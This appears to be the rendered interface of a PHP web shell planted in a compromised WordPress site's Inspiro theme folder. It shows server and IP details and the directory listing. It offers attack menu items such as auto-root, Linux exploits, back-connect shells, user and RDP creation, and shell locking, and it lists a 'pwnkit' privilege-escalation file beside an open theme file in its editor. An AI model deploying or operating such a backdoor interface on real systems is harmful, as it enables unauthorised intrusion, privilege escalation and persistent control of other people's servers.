Linux webm003.cluster129.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.129.20.3 | : 216.73.217.63
Cant Read [ /etc/named.conf ]
8.4.22
chloega
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
chloega /
www /
wp-content /
themes /
inspiro /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxr-xr-x
customizer
[ DIR ]
drwxr-xr-x
dynamic-css
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
admin-notice.php
4.72
KB
-rw-r--r--
back-compat.php
2.27
KB
-rw-r--r--
color-patterns.php
723
B
-rw-r--r--
common-functions.php
18.44
KB
-rw-r--r--
custom-header.php
18.26
KB
-rw-r--r--
customizer-functions.php
4.96
KB
-rw-r--r--
editor-fonts.php
2.53
KB
-rw-r--r--
google-fonts.php
186.01
KB
-rw-r--r--
icon-functions.php
2.41
KB
-rw-r--r--
marketing-functions.php
9.95
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
shortcodes.php
938
B
-rw-r--r--
starter-content.php
125.28
KB
-rw-r--r--
template-functions.php
7.5
KB
-rw-r--r--
template-tags.php
7.29
KB
-rw-r--r--
theme-media.php
2.4
KB
-rw-r--r--
wc-custom-functions.php
456
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : editor-fonts.php
<?php /** * Editor Typography * * @package Inspiro * @subpackage Inspiro_Lite * @since Inspiro 1.3.0 */ if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } /** * Enqueue editor styles and fonts */ function inspiro_block_editor_fonts_styles() { // Get font settings from customizer $body_font = get_theme_mod('body-font-family', "'Inter', sans-serif"); $headings_font = get_theme_mod('headings-font-family', "'Onest', sans-serif"); // Generate dynamic CSS $css = " /* Editor Typography */ body .editor-styles-wrapper, body .editor-styles-wrapper p, body .editor-styles-wrapper .wp-block, .wp-block { font-family: {$body_font} !important; } .wpzoom-blocks_portfolio-block .wpz-portfolio-button__link, .wp-block-post-title, .wp-block-heading, .wp-block-button .wp-block-button__link, body .editor-styles-wrapper .editor-post-title__block .editor-post-title__input, body .editor-styles-wrapper h1, body .editor-styles-wrapper h2, body .editor-styles-wrapper h3, body .editor-styles-wrapper h4, body .editor-styles-wrapper h5, body .editor-styles-wrapper h6, body .editor-styles-wrapper .wp-block h1, body .editor-styles-wrapper .wp-block h2, body .editor-styles-wrapper .wp-block h3, body .editor-styles-wrapper .wp-block h4, body .editor-styles-wrapper .wp-block h5, body .editor-styles-wrapper .wp-block h6, body .editor-styles-wrapper .wp-block-heading, body .editor-styles-wrapper .wp-block-button .wp-block-button__link { font-family: {$headings_font} !important; } "; // Create editor-specific stylesheet $editor_style = array( 'assets/css/' . ((SCRIPT_DEBUG) ? 'unminified' : 'minified') . '/editor-style' . ((SCRIPT_DEBUG) ? '' : '.min') . '.css' ); // Get Google Fonts URL $google_fonts_url = Inspiro_Fonts_Manager::get_google_font_url(); if (!empty($google_fonts_url)) { $editor_style[] = $google_fonts_url; } // Remove existing editor styles first remove_editor_styles(); // Add our compiled styles add_editor_style($editor_style); // Add inline styles for typography wp_add_inline_style('wp-edit-blocks', $css); } // Use both hooks to ensure styles are loaded in all contexts add_action('admin_init', 'inspiro_block_editor_fonts_styles'); add_action('enqueue_block_editor_assets', 'inspiro_block_editor_fonts_styles');
Close